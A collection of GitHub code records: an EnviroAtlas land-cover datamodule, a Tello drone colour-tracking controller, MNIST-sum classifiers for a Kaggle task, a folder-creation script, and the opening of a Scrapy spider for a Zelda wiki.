sample[\"image\"].shape\n\n y1 = (height - size) // 2\n x1 = (width - size) // 2\n sample[\"image\"] = sample[\"image\"][:, y1 : y1 + size, x1 : x1 + size]\n sample[\"mask\"] = sample[\"mask\"][:, y1 : y1 + size, x1 : x1 + size]\n\n return sample\n\n return center_crop_inner\n\n def preprocess(self, sample: Dict[str, Any]) -> Dict[str, Any]:\n \"\"\"Preprocesses a single sample.\"\"\"\n # sample['image'] contains the weak inputs, sample['mask'] is the hr labelsß\n\n # normalize just the NLCD layers because they get stored as 0...255\n sample[\"image\"] = sample[\"image\"].float()\n sample[\"image\"][: self.num_nlcd_layers] = (\n sample[\"image\"][: self.num_nlcd_layers] / 255.0\n )\n\n # handle reindexing the labels\n\n reindex_map = dict(zip(self.classes_keep, np.arange(len(self.classes_keep))))\n # reindex shrub to tree for learning the prior\n tree_idx = 3 # tree idx is 3 when there are no zeros\n shrub_idx = 5\n reindex_map[shrub_idx] = tree_idx\n reindexed_mask = -1 * torch.ones(sample[\"mask\"].shape)\n for old_idx, new_idx in reindex_map.items():\n reindexed_mask[sample[\"mask\"] == old_idx] = new_idx\n\n reindexed_mask[reindexed_mask == -1] = self.ignore_index\n assert (reindexed_mask >= 0).all()\n\n sample[\"mask\"] = reindexed_mask\n\n if self.onehot_encode_labels:\n sample[\"mask\"] = (\n nn.functional.one_hot(\n sample[\"mask\"].to(torch.int64), num_classes=self.n_classes\n )\n .transpose(0, 2)\n .transpose(1, 2)\n )\n\n sample[\"mask\"] = sample[\"mask\"].squeeze().long()\n \n del sample[\"bbox\"]\n \n return sample\n \n def nodata_check(\n self, size: int = 512\n ) -> Callable[[Dict[str, Tensor]], Dict[str, Tensor]]:\n \"\"\"Returns a function to check for nodata or mis-sized input.\n Args:\n size: output image size\n Returns:\n function to check for nodata values\n \"\"\"\n\n def nodata_check_inner(sample: Dict[str, Tensor]) -> Dict[str, Tensor]:\n num_channels, height, width = sample[\"image\"].shape\n\n if height < size or width < size:\n sample[\"image\"] = torch.zeros( # type: ignore[attr-defined]\n (num_channels, size, size)\n )\n sample[\"mask\"] = torch.zeros((size, size)) # type: ignore[attr-defined]\n\n return sample\n\n return nodata_check_inner\n\n def prepare_data(self) -> None:\n \"\"\"Confirms that the dataset is downloaded on the local node.\n\n This method is called once per node, while :func:`setup` is called once per GPU.\n \"\"\"\n EnviroAtlas(\n self.root_dir,\n splits=self.train_sets,\n layers=self.layers,\n prior_as_input=self.prior_as_input,\n transforms=None,\n download=False,\n checksum=False,\n )\n\n def setup(self, stage: Optional[str] = None) -> None:\n \"\"\"Create the train/val/test splits based on the original Dataset objects.\n\n The splits should be done here vs. 
in :func:`__init__` per the docs:\n https://pytorch-lightning.readthedocs.io/en/latest/extensions/datamodules.html#setup.\n \"\"\"\n train_transforms = Compose(\n [\n self.center_crop(self.patch_size),\n self.nodata_check(self.patch_size),\n self.preprocess,\n ]\n )\n val_transforms = Compose(\n [\n self.center_crop(self.patch_size),\n self.nodata_check(self.patch_size),\n self.preprocess,\n ]\n )\n test_transforms = Compose(\n [\n self.pad_to(self.original_patch_size, image_value=0, mask_value=11),\n self.preprocess,\n ]\n )\n\n print(\"training on \", self.train_sets)\n self.train_dataset = EnviroAtlas(\n self.root_dir,\n splits=self.train_sets,\n layers=self.layers,\n prior_as_input=self.prior_as_input,\n transforms=train_transforms,\n download=False,\n checksum=False,\n )\n self.val_dataset = EnviroAtlas(\n self.root_dir,\n splits=self.val_sets,\n layers=self.layers,\n prior_as_input=self.prior_as_input,\n transforms=val_transforms,\n download=False,\n checksum=False,\n )\n self.test_dataset = EnviroAtlas(\n self.root_dir,\n splits=self.test_sets,\n layers=self.layers,\n prior_as_input=self.prior_as_input,\n transforms=test_transforms,\n download=False,\n checksum=False,\n )\n\n def train_dataloader(self) -> DataLoader[Any]:\n \"\"\"Return a DataLoader for training.\n Returns:\n training data loader\n \"\"\"\n sampler = RandomBatchGeoSampler(\n self.train_dataset,\n size=self.original_patch_size,\n batch_size=self.batch_size,\n length=self.patches_per_tile * len(self.train_dataset),\n )\n return DataLoader(\n self.train_dataset,\n batch_sampler=sampler,\n num_workers=self.num_workers,\n collate_fn=stack_samples,\n )\n\n def val_dataloader(self) -> DataLoader[Any]:\n \"\"\"Return a DataLoader for validation.\n Returns:\n validation data loader\n \"\"\"\n sampler = GridGeoSampler(\n self.val_dataset,\n size=self.original_patch_size,\n stride=self.original_patch_size,\n )\n return DataLoader(\n self.val_dataset,\n batch_size=self.batch_size,\n sampler=sampler,\n num_workers=self.num_workers,\n collate_fn=stack_samples,\n shuffle=False\n )\n\n def test_dataloader(self) -> DataLoader[Any]:\n \"\"\"Return a DataLoader for testing.\n\n Returns:\n testing data loader\n \"\"\"\n sampler = GridGeoSampler(\n self.test_dataset,\n size=self.original_patch_size,\n stride=self.original_patch_size,\n )\n return DataLoader(\n self.test_dataset,\n batch_size=32,\n sampler=sampler,\n num_workers=self.num_workers,\n collate_fn=stack_samples,\n shuffle=False\n )","repo_name":"estherrolf/implicit-posterior","sub_path":"qr_for_landcover/datamodules/enviroatlas_learn_prior_datamodule.py","file_name":"enviroatlas_learn_prior_datamodule.py","file_ext":"py","file_size_in_byte":12766,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"7876207501","text":"import cv2\nimport pygame\nimport numpy as np\nimport time\n\nfrom djitellopy import Tello\nfrom pygame.locals import *\n\n\n#\n# 8888888 d8b 888 d8b 888 d8b 888 d8b\n# 888 Y8P 888 Y8P 888 Y8P 888 Y8P\n# 888 888 888 888\n# 888 88888b. 888 888888 888 8888b. 888 888 .d8888b 8888b. 888888 888 .d88b. 88888b.\n# 888 888 \"88b 888 888 888 \"88b 888 888 88K \"88b 888 888 d88\"\"88b 888 \"88b\n# 888 888 888 888 888 888 .d888888 888 888 \"Y8888b. .d888888 888 888 888 888 888 888\n# 888 888 888 888 Y88b. 888 888 888 888 888 X88 888 888 Y88b. 
888 Y88..88P 888 888\n# 8888888 888 888 888 \"Y888 888 \"Y888888 888 888 88888P' \"Y888888 \"Y888 888 \"Y88P\" 888 888\n#\n\n\nclass FrontEnd(object):\n \"\"\" Maintains the Tello display and moves it through the keyboard keys.\n Press escape key to quit.\n The controls are:\n - Tab: Takeoff\n - Shift: Land\n - Space: Emergency Shutdown\n - WASD: Forward, backward, left and right\n - Q and E: Counter clockwise and clockwise rotations\n - R and F: Up and down\n - T: Start/Stop tracking\n - C: Select central pixel value as new color for tracking\n - #: Switch controllable parameter\n - + and -: Raise or Lower controllable parameter\n \"\"\"\n\n def __init__(self):\n # Init pygame\n pygame.init()\n\n # Init Tello object that interacts with the Tello drone\n self.tello = Tello()\n\n # general config\n self.internalSpeed = 100\n self.FPS = 20\n self.hud_size = (800, 600)\n\n\n # config of controllable parameters\n self.controll_params = {\n 'Speed': 100,\n 'Color': 0,\n }\n self.controll_params_d = {\n 'Speed': 10,\n 'Color': 1,\n }\n self.controll_params_m = {\n 'Speed': 100,\n 'Color': 2,\n }\n\n # tracker config\n self.color_lower = {\n 'blue': (100, 200, 50),\n 'red': (0, 200, 100),\n 'yellow': (20, 200, 130),\n }\n self.color_upper = {\n 'blue': (140, 255, 255),\n 'red': (20, 255, 255),\n 'yellow': (40, 255, 255),\n }\n\n self.current_color = np.array(self.color_lower['blue']) + np.array(self.color_upper['blue'])\n for i in range(0,3): self.current_color[i] = self.current_color[i] / 2\n self.crange = (10, 50, 50)\n\n # other params (no need to config)\n self.current_parameter = 0\n self.param_keys = list(self.controll_params.keys())\n self.color_keys = list(self.color_lower.keys())\n self.central_color = (0,0,0)\n self.midx = int(self.hud_size[0] / 2)\n self.midy = int(self.hud_size[1] / 2)\n self.xoffset = 0\n self.yoffset = 0\n self.target_radius = 120\n self.for_back_velocity = 0\n self.left_right_velocity = 0\n self.up_down_velocity = 0\n self.yaw_velocity = 0\n self.send_rc_control = False\n self.isTracking = False\n\n # Creat pygame window\n pygame.display.set_caption(\"Tello video stream\")\n self.screen = pygame.display.set_mode(self.hud_size)\n\n # create update timer\n pygame.time.set_timer(USEREVENT + 1, 50)\n\n\n#\n# 888b d888 d8b 888\n# 8888b d8888 Y8P 888\n# 88888b.d88888 888\n# 888Y88888P888 8888b. 888 88888b. 888 .d88b. .d88b. 88888b.\n# 888 Y888P 888 \"88b 888 888 \"88b 888 d88\"\"88b d88\"\"88b 888 \"88b\n# 888 Y8P 888 .d888888 888 888 888 888 888 888 888 888 888 888\n# 888 \" 888 888 888 888 888 888 888 Y88..88P Y88..88P 888 d88P\n# 888 888 \"Y888888 888 888 888 88888888 \"Y88P\" \"Y88P\" 88888P\"\n# 888\n# 888\n# 888\n#\n\n\n def run(self):\n \"\"\"\n Main loop.\n Contains reading the incoming frames, the call for tracking and basic keyboard stuff.\n \"\"\"\n\n if not self.tello.connect():\n print(\"Tello not connected\")\n return\n\n if not self.tello.set_speed(self.internalSpeed):\n print(\"Not set speed to lowest possible\")\n return\n\n # In case streaming is on. 
This happens when we quit this program without the escape key.\n if not self.tello.streamoff():\n print(\"Could not stop video stream\")\n return\n\n if not self.tello.streamon():\n print(\"Could not start video stream\")\n return\n\n frame_read = self.tello.get_frame_read()\n\n self.should_stop = False\n while not self.should_stop:\n\n # read frame\n img = cv2.cvtColor(frame_read.frame, cv2.COLOR_BGR2RGB)\n img = cv2.resize(img, self.hud_size, interpolation=cv2.INTER_AREA)\n\n # get output from tracking\n if self.isTracking:\n self.track(img)\n\n # produce hud\n self.frame = self.write_hud(img.copy())\n self.frame = np.fliplr(self.frame)\n self.frame = np.rot90(self.frame)\n self.frame = pygame.surfarray.make_surface(self.frame)\n self.screen.fill([0, 0, 0])\n self.screen.blit(self.frame, (0, 0))\n pygame.display.update()\n\n # handle input from dronet or user\n for event in pygame.event.get():\n if event.type == USEREVENT + 1:\n self.send_input()\n elif event.type == QUIT:\n self.should_stop = True\n elif event.type == KEYDOWN:\n if (event.key == K_ESCAPE) or (event.key == K_BACKSPACE):\n self.should_stop = True\n else:\n self.keydown(event.key)\n elif event.type == KEYUP:\n self.keyup(event.key)\n\n # shutdown stream\n if frame_read.stopped:\n frame_read.stop()\n break\n\n # wait a little\n time.sleep(1 / self.FPS)\n\n # always call before finishing to deallocate resources\n self.tello.end()\n\n\n def track(self, frame):\n \"\"\"\n HSV color space tracking.\n \"\"\"\n # resize the frame, blur it, and convert it to the HSV\n # color space\n blurred = cv2.GaussianBlur(frame, (11, 11), 0)\n hsv = cv2.cvtColor(blurred, cv2.COLOR_RGB2HSV)\n self.central_color = hsv[self.midy,self.midx,:]\n\n # construct a mask for the color then perform\n # a series of dilations and erosions to remove any small\n # blobs left in the mask\n mask = cv2.inRange(hsv, self.current_color - self.crange, self.current_color + self.crange)\n mask = cv2.erode(mask, None, iterations=3)\n mask = cv2.dilate(mask, None, iterations=3)\n\n # find contours in the mask and initialize the current\n # (x, y) center of the ball\n image, cnts, hierarchy = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL,\n cv2.CHAIN_APPROX_SIMPLE)\n\n center = None\n\n radius = 0\n velocity = 0\n # only proceed if at least one contour was found\n if len(cnts) > 0:\n # update color from mean color\n mask_upstate = cv2.bitwise_and(hsv, hsv, mask=mask)\n mean = cv2.mean(mask_upstate)\n multiplier = float(mask.size)/(cv2.countNonZero(mask)+0.001)\n mean = np.array([multiplier * x for x in mean])\n\n self.update_color(mean)\n print(self.current_color)\n\n # find the largest contour in the mask, then use\n # it to compute the minimum enclosing circle and\n # centroid\n c = max(cnts, key=cv2.contourArea)\n\n ((x, y), radius) = cv2.minEnclosingCircle(c)\n M = cv2.moments(c)\n\n center = (int(M[\"m10\"] / M[\"m00\"]), int(M[\"m01\"] / M[\"m00\"]))\n\n # only proceed if the radius meets a minimum size\n if radius > 40:\n # draw the circle and centroid on the frame,\n # then update the list of tracked points\n cv2.circle(frame, (int(x), int(y)), int(radius),\n (0, 255, 0), 2)\n\n self.xoffset = int(center[0] - self.midx)\n self.yoffset = int(self.midy - center[1])\n velocity = clamp(self.target_radius - radius, -40, 60) / 100 * self.controll_params['Speed']\n else:\n self.xoffset = 0\n self.yoffset = 0\n velocity = 0\n else:\n self.xoffset = 0\n self.yoffset = 0\n velocity = 0\n\n xfact = self.xoffset / self.hud_size[0] * self.controll_params['Speed'] * 2\n 
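# note: both gains are normalised by the frame width (hud_size[0]), which looks\n            # deliberate so horizontal and vertical sensitivity match; together with\n            # 'velocity' above this forms a simple proportional controller on the\n            # target's pixel offset and apparent radius\n            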
yfact = self.yoffset / self.hud_size[0] * self.controll_params['Speed'] * 2\n\n self.for_back_velocity = int(velocity)\n self.yaw_velocity = int(xfact)\n self.up_down_velocity = int(yfact)\n\n\n#\n# 8888888 888 888b d888 888 888 888\n# 888 888 8888b d8888 888 888 888\n# 888 888 88888b.d88888 888 888 888\n# 888 88888b. 88888b. 888 888 888888 888Y88888P888 .d88b. 888888 88888b. .d88b. .d88888 .d8888b\n# 888 888 \"88b 888 \"88b 888 888 888 888 Y888P 888 d8P Y8b 888 888 \"88b d88\"\"88b d88\" 888 88K\n# 888 888 888 888 888 888 888 888 888 Y8P 888 88888888 888 888 888 888 888 888 888 \"Y8888b.\n# 888 888 888 888 d88P Y88b 888 Y88b. 888 \" 888 Y8b. Y88b. 888 888 Y88..88P Y88b 888 X88\n# 8888888 888 888 88888P\" \"Y88888 \"Y888 888 888 \"Y8888 \"Y888 888 888 \"Y88P\" \"Y88888 88888P'\n# 888\n# 888\n# 888\n#\n\n\n def keydown(self, key):\n \"\"\" Update velocities based on key pressed\n Arguments:\n key: pygame key\n \"\"\"\n if key == pygame.K_w: # set forward velocity\n self.isTracking = False\n self.for_back_velocity = self.controll_params['Speed']\n elif key == pygame.K_s: # set backward velocity\n self.isTracking = False\n self.for_back_velocity = -self.controll_params['Speed']\n elif key == pygame.K_a: # set left velocity\n self.isTracking = False\n self.left_right_velocity = -self.controll_params['Speed']\n elif key == pygame.K_d: # set right velocity\n self.isTracking = False\n self.left_right_velocity = self.controll_params['Speed']\n elif key == pygame.K_r: # set up velocity\n self.isTracking = False\n self.up_down_velocity = self.controll_params['Speed']\n elif key == pygame.K_f: # set down velocity\n self.isTracking = False\n self.up_down_velocity = -self.controll_params['Speed']\n elif key == pygame.K_e: # set yaw clockwise velocity\n self.isTracking = False\n self.yaw_velocity = self.controll_params['Speed']\n elif key == pygame.K_q: # set yaw counter clockwise velocity\n self.isTracking = False\n self.yaw_velocity = -self.controll_params['Speed']\n elif key == pygame.K_TAB: # takeoff\n self.tello.takeoff()\n self.send_rc_control = True\n elif key == pygame.K_LSHIFT: # land\n self.isTracking = False\n self.tello.land()\n self.send_rc_control = False\n elif key == pygame.K_SPACE: # emergency shutdown\n self.isTracking = False\n self.tello.emergency()\n self.send_rc_control = False\n self.should_stop = True\n elif key == pygame.K_BACKSPACE: # emergency shutdown\n self.isTracking = False\n self.send_rc_control = False\n self.should_stop = True\n elif key == pygame.K_t: # arm tracking\n self.isTracking = not self.isTracking\n self.for_back_velocity = 0\n self.yaw_velocity = 0\n self.up_down_velocity = 0\n elif key == pygame.K_c: # get new color\n self.set_color(self.central_color)\n self.for_back_velocity = 0\n self.yaw_velocity = 0\n self.up_down_velocity = 0\n elif key == pygame.K_HASH: # switch parameters\n if self.current_parameter == 0:\n self.current_parameter = 1\n else:\n self.current_parameter = 0\n elif key == pygame.K_PLUS: # raise current parameter\n what = self.param_keys[self.current_parameter]\n if self.controll_params[what] < self.controll_params_m[what] - 0.01:\n self.controll_params[what] = self.controll_params[what] + self.controll_params_d[what]\n if (what == 'Color'):\n self.reset_color()\n elif key == pygame.K_MINUS: # lower current parameter\n what = self.param_keys[self.current_parameter]\n if self.controll_params[what] > 0.01:\n self.controll_params[what] = self.controll_params[what] - self.controll_params_d[what]\n if (what == 'Color'):\n 
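# switching the colour selection invalidates the current HSV window,\n                    # so re-centre it on the newly selected band's bounds\n                    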
self.reset_color()\n\n\n def keyup(self, key):\n \"\"\" Update velocities based on key released\n Arguments:\n key: pygame key\n \"\"\"\n if key == pygame.K_w or key == pygame.K_s: # set zero forward/backward velocity\n self.for_back_velocity = 0\n elif key == pygame.K_a or key == pygame.K_d: # set zero left/right velocity\n self.left_right_velocity = 0\n elif key == pygame.K_r or key == pygame.K_f: # set zero up/down velocity\n self.up_down_velocity = 0\n elif key == pygame.K_q or key == pygame.K_e: # set zero yaw velocity\n self.yaw_velocity = 0\n\n\n def send_input(self):\n \"\"\" Update routine. Send velocities to Tello.\"\"\"\n #print(\"V: \" + str(self.for_back_velocity) + \"; Y: \" + str(self.yaw_velocity))\n if self.send_rc_control:\n self.tello.send_rc_control(self.left_right_velocity, self.for_back_velocity, self.up_down_velocity,\n self.yaw_velocity)\n\n\n#\n# 888 888 888 888b d888 888 888 888\n# 888 888 888 8888b d8888 888 888 888\n# 888 888 888 88888b.d88888 888 888 888\n# 8888888888 .d88b. 888 88888b. .d88b. 888d888 888Y88888P888 .d88b. 888888 88888b. .d88b. .d88888 .d8888b\n# 888 888 d8P Y8b 888 888 \"88b d8P Y8b 888P\" 888 Y888P 888 d8P Y8b 888 888 \"88b d88\"\"88b d88\" 888 88K\n# 888 888 88888888 888 888 888 88888888 888 888 Y8P 888 88888888 888 888 888 888 888 888 888 \"Y8888b.\n# 888 888 Y8b. 888 888 d88P Y8b. 888 888 \" 888 Y8b. Y88b. 888 888 Y88..88P Y88b 888 X88\n# 888 888 \"Y8888 888 88888P\" \"Y8888 888 888 888 \"Y8888 \"Y888 888 888 \"Y88P\" \"Y88888 88888P'\n# 888\n# 888\n# 888\n#\n\n\n def update_color(self, val):\n \"\"\"\n Adjusts the currently tracked color to input.\n \"\"\"\n if (cv2.mean(val) != 0):\n for i in range(0,2):\n self.current_color[i] = clamp(val[i],\n self.color_lower[self.color_keys[self.controll_params['Color']]][i],\n self.color_upper[self.color_keys[self.controll_params['Color']]][i])\n\n def set_color(self, val):\n self.current_color = np.array(val)\n print(val)\n\n def reset_color(self):\n self.current_color = np.array(self.color_lower[self.color_keys[self.controll_params['Color']]]) + np.array(self.color_upper[self.color_keys[self.controll_params['Color']]])\n for i in range(0,3): self.current_color[i] = self.current_color[i] / 2\n\n def write_hud(self, frame):\n \"\"\"Draw drone info and record on frame\"\"\"\n stats = [\"TelloTracker\"]\n if self.isTracking:\n stats.append(\"Tracking active.\")\n stats.append(\"Speed: {:03d}\".format(self.controll_params['Speed']))\n stats.append(\"Color: \" + self.color_keys[self.controll_params['Color']])\n self.draw_arrows(frame)\n else:\n stats.append(\"Tracking disabled.\")\n img = cv2.circle(frame, (self.midx, self.midy), 10, (0,0,255), 1)\n\n stats.append(self.param_keys[self.current_parameter] + \": {:4.1f}\".format(self.controll_params[self.param_keys[self.current_parameter]]))\n for idx, stat in enumerate(stats):\n text = stat.lstrip()\n cv2.putText(frame, text, (0, 30 + (idx * 30)),\n cv2.FONT_HERSHEY_SIMPLEX,\n 1.0, (255, 0, 0), lineType=30)\n return frame\n\n def draw_arrows(self, frame):\n \"\"\"Show the direction vector output in the cv2 window\"\"\"\n #cv2.putText(frame,\"Color:\", (0, 35), cv2.FONT_HERSHEY_SIMPLEX, 1, 255, thickness=2)\n cv2.arrowedLine(frame, (self.midx, self.midy),\n (self.midx + self.xoffset, self.midy - self.yoffset),\n (255, 0, 0), 5)\n return frame\n\ndef clamp(n, smallest, largest): return max(smallest, min(n, largest))\n\ndef main():\n frontend = FrontEnd()\n\n # run frontend\n frontend.run()\n\n\nif __name__ == '__main__':\n 
main()\n","repo_name":"nfinitedesign/tello-color-tracking","sub_path":"tellotracker.py","file_name":"tellotracker.py","file_ext":"py","file_size_in_byte":18593,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"5668344189","text":"import numpy\nimport numpy as np\nfrom util import softmax\nimport torch\nfrom torch import nn\nimport torch.nn.functional as F\nimport time\n\n\n# Authors: Guillaume Gagné-Labelle, Yann Saah, Giovanni Belval\n# Date: Oct 2022\n# Project: Kaggle Competition - IFT3395\n# Description: Classification of the sum of 2 MNIST images\n\nclass logistic:\n def __init__(self, args):\n self.W = np.random.normal(size=(28 * 28, 10)) # num_classes = 10, dimension = 28x28\n self.b = np.zeros(10)\n self.lr = args.lr\n self.decay = args.decay\n\n # predict a label out of a probability distribution computed by a logistic regression from an image\n # input: batch of pairs of images: [batch_size, 2, 28, 28]\n # output: batch of probabilities for both images: [batch_size, 10], [batch_size, 10]\n # batch of labels: [batch_size]\n def prediction(self, images):\n B = images.shape[0] # batch size\n image1 = images[:, 0, :, :].reshape(B, -1)\n image2 = images[:, 1, :, :].reshape(B, -1)\n\n prob1 = softmax(np.matmul(self.W.transpose(), image1[:, :, np.newaxis]).squeeze() + self.b) # W_t X1 + b\n prob2 = softmax(np.matmul(self.W.transpose(), image2[:, :, np.newaxis]).squeeze() + self.b) # W_t X2 + b\n\n prob = np.zeros((B, 19))\n for b in range(B):\n for k in range(19):\n for i in range(10):\n if 0 <= k - i < 10: prob[b, k] += prob1[b, i] * prob2[b, k - i]\n\n pred = np.argmax(prob, axis=1)\n\n return pred, prob, prob1, prob2\n\n\n def update(self, images, prob, prob1, prob2, labels):\n B = images.shape[0]\n image1 = images[:, 0, :, :].reshape(B, -1)\n image2 = images[:, 1, :, :].reshape(B, -1)\n\n grad_W = np.zeros_like(self.W)\n grad_b = np.zeros_like(self.b)\n for N in range(B):\n for i in range(10):\n if i != labels[N]: continue\n A = - 1 / prob[N, i]\n for k in range(i):\n B1 = prob2[N, i - k]\n B2 = prob1[N, i - k]\n for m in range(10):\n if k == m:\n C1 = prob1[N, k] * (1 - prob1[N, k])\n C2 = prob2[N, k] * (1 - prob2[N, k])\n else:\n C1 = - prob1[N, k] * prob2[N, m]\n C2 = - prob2[N, k] * prob2[N, m]\n\n grad_b[m] += A * (B1*C1 + B2*C2)\n for n in range(28 * 28):\n D1 = image1[N, n]\n D2 = image2[N, n]\n grad_W[n][m] += A * (B1*C1*D1 + B2*C2*D2)\n\n self.W -= (self.lr * grad_W / B + 2e-4 * self.W) # lambda = 1e-4 (Ridge)\n self.b -= self.lr * grad_b / B\n\n\nclass InferenceModel(nn.Module):\n def __init__(self, in_dim):\n super().__init__()\n\n self.pred = get_enc(in_dim)\n self.cls = nn.Sequential(nn.Linear(128, 19)) # not softmaxed\n\n def forward(self, d_x):\n pred = self.pred(d_x)\n pred = self.cls(pred)\n return pred\n\n\ndef get_enc(in_dim):\n enc_sz = 256\n return nn.Sequential(\n nn.Conv2d(in_dim[0], 32, kernel_size=3, stride=1, padding=1, bias=True),\n nn.BatchNorm2d(32),\n nn.ReLU(),\n\n nn.Conv2d(32, 64, kernel_size=3, stride=1, padding=1, bias=True),\n nn.BatchNorm2d(64),\n nn.ReLU(),\n\n nn.MaxPool2d(2, 2), # 14, 28\n nn.Flatten(start_dim=1),\n nn.Linear(64 * 14 * 28, enc_sz),\n nn.BatchNorm1d(enc_sz),\n\n nn.ReLU(),\n nn.Linear(enc_sz, 128),\n nn.BatchNorm1d(128),\n )\n\n\n# Defining the convolutional neural network\nclass LeNet5(nn.Module):\n def __init__(self, num_classes):\n super(LeNet5, self).__init__()\n self.layer1 = nn.Sequential(\n nn.Conv2d(1, 6, kernel_size=5, stride=1, padding=0),\n 
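# shape sketch (assuming the 1x28x56 paired-MNIST input implied by the\n            # nn.Linear(704, 120) below): 5x5 conv -> 6x24x52, max-pooled to 6x12x26\n            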
nn.BatchNorm2d(6),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=2, stride=2)) # 14,28\n self.layer2 = nn.Sequential(\n nn.Conv2d(6, 16, kernel_size=5, stride=1, padding=0),\n nn.BatchNorm2d(16),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=2, stride=2)) # 7, 14\n self.fc = nn.Linear(704, 120)\n self.relu = nn.ReLU()\n self.fc1 = nn.Linear(120, 84)\n self.relu1 = nn.ReLU()\n self.fc2 = nn.Linear(84, num_classes)\n\n def forward(self, x):\n out = self.layer1(x)\n out = self.layer2(out)\n out = out.reshape(out.size(0), -1)\n out = self.fc(out)\n out = self.relu(out)\n out = self.fc1(out)\n out = self.relu1(out)\n out = self.fc2(out)\n return out\n\n\nclass Net(nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n\n # define a conv layer with output channels as 16, kernel size of 3 and stride of 1\n self.conv11 = nn.Conv2d(1, 16, (3, 5), 1) # Input = 1x28x56 Output = 16x26x52\n self.conv12 = nn.Conv2d(1, 16, (5, 9), 1) # Input = 1x28x56 Output = 16x24x48\n self.conv13 = nn.Conv2d(1, 16, (7, 13), 1) # Input = 1x28x56 Output = 16x22x44\n self.conv14 = nn.Conv2d(1, 16, (9, 17), 1) # Input = 1x28x56 Output = 16x20x40\n\n # define a conv layer with output channels as 32, kernel size of 3 and stride of 1\n self.conv21 = nn.Conv2d(16, 32, (3, 5), 1) # Input = 16x26x52 Output = 32x24x48\n self.conv22 = nn.Conv2d(16, 32, (5, 9), 1) # Input = 16x24x48 Output = 32x20x40\n self.conv23 = nn.Conv2d(16, 32, (7, 13), 1) # Input = 16x22x44 Output = 32x16x32\n self.conv24 = nn.Conv2d(16, 32, (9, 17), 1) # Input = 16x20x40 Output = 32x12x24\n\n # define a conv layer with output channels as 64, kernel size of 3 and stride of 1\n self.conv31 = nn.Conv2d(32, 64, (3, 5), 1) # Input = 32x24x48 Output = 64x22x44\n self.conv32 = nn.Conv2d(32, 64, (5, 9), 1) # Input = 32x20x40 Output = 64x16x32\n self.conv33 = nn.Conv2d(32, 64, (7, 13), 1) # Input = 32x16x32 Output = 64x10x20\n self.conv34 = nn.Conv2d(32, 64, (9, 17), 1) # Input = 32x12x24 Output = 64x4x8\n\n # define a max pooling layer with kernel size 2\n self.maxpool = nn.MaxPool2d(2) # Output = 64x11x22\n # self.maxpool1 = nn.MaxPool2d(1)\n # define dropout layer with a probability of 0.25\n self.dropout1 = nn.Dropout(0.25)\n # define dropout layer with a probability of 0.5\n self.dropout2 = nn.Dropout(0.5)\n\n # define a linear(dense) layer with 128 output features\n self.fc11 = nn.Linear(64 * 11 * 22, 256)\n self.fc12 = nn.Linear(64 * 8 * 16, 256) # after maxpooling 2x2\n self.fc13 = nn.Linear(64 * 5 * 10, 256)\n self.fc14 = nn.Linear(64 * 2 * 4, 256)\n\n # define a linear(dense) layer with output features corresponding to the number of classes in the dataset\n self.fc21 = nn.Linear(256, 128)\n self.fc22 = nn.Linear(256, 128)\n self.fc23 = nn.Linear(256, 128)\n self.fc24 = nn.Linear(256, 128)\n\n self.fc33 = nn.Linear(128 * 4, 19)\n\n def forward(self, inp):\n # Use the layers defined above in a sequential way (follow the same as the layer definitions above) and\n # write the forward pass, after each of conv1, conv2, conv3 and fc1 use a relu activation.\n\n x = F.relu(self.conv11(inp))\n x = F.relu(self.conv21(x))\n x = F.relu(self.maxpool(self.conv31(x)))\n # print(x.shape)\n # x = torch.flatten(x, 1)\n x = x.view(-1, 64 * 11 * 22)\n x = self.dropout1(x)\n x = F.relu(self.fc11(x))\n x = self.dropout2(x)\n x = self.fc21(x)\n\n y = F.relu(self.conv12(inp))\n y = F.relu(self.conv22(y))\n y = F.relu(self.maxpool(self.conv32(y)))\n # x = torch.flatten(x, 1)\n y = y.view(-1, 64 * 8 * 16)\n y = self.dropout1(y)\n y = F.relu(self.fc12(y))\n y = self.dropout2(y)\n y = 
self.fc22(y)\n\n        z = F.relu(self.conv13(inp))\n        z = F.relu(self.conv23(z))\n        z = F.relu(self.maxpool(self.conv33(z)))\n        # x = torch.flatten(x, 1)\n        z = z.view(-1, 64 * 5 * 10)\n        z = self.dropout1(z)\n        z = F.relu(self.fc13(z))\n        z = self.dropout2(z)\n        z = self.fc23(z)\n\n        ze = F.relu(self.conv14(inp))\n        ze = F.relu(self.conv24(ze))\n        ze = F.relu(self.maxpool(self.conv34(ze)))\n        # x = torch.flatten(x, 1)\n        ze = ze.view(-1, 64 * 2 * 4)\n        ze = self.dropout1(ze)\n        ze = F.relu(self.fc14(ze))\n        ze = self.dropout2(ze)\n        ze = self.fc24(ze)\n\n        out_f = torch.cat((x, y, z, ze), dim=1)\n        # out_f1 = torch.cat((out_f, ze), dim=1)\n        out = self.fc33(out_f)\n\n        # raw logits are returned; apply log_softmax externally if the loss needs it\n        return out\n","repo_name":"guillaume-gagnelabelle/kaggle_mnist","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71268458934","text":"from pathlib import Path\n\nsource_path = Path(__file__).resolve() \ntarget_path = source_path.parent / \"data\"\n\nd = {\"Films\": [\"Le seigneur des anneaux\",\n               \"Harry Potter\",\n               \"Moon\",\n               \"Forrest Gump\"],\n     \"Employes\": [\"Paul\",\n                  \"Pierre\",\n                  \"Marie\"],\n     \"Exercices\": [\"les_variables\",\n                   \"les_fichiers\",\n                   \"les_boucles\"]}\n\nfor parent_folder, inner_folders in d.items():\n    for inner_folder in inner_folders:\n        folder_path = target_path / parent_folder / inner_folder\n        folder_path.mkdir(exist_ok=True, parents=True)","repo_name":"aurechabnv/training-python","sub_path":"structure-de-dossiers/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10827917518","text":"\"\"\"crawl/crawl/spiders/zelda_items.py\"\"\"\nfrom scrapy import Request, Spider\n\n\nclass ZeldaItemsSpider(Spider):\n    \"\"\"\n    Defines the ZeldaItemsSpider\n    \"\"\"\n\n    name = \"zelda_items\"\n    base_url = \"http://zelda.gamepedia.com\"\n    allowed_domains = 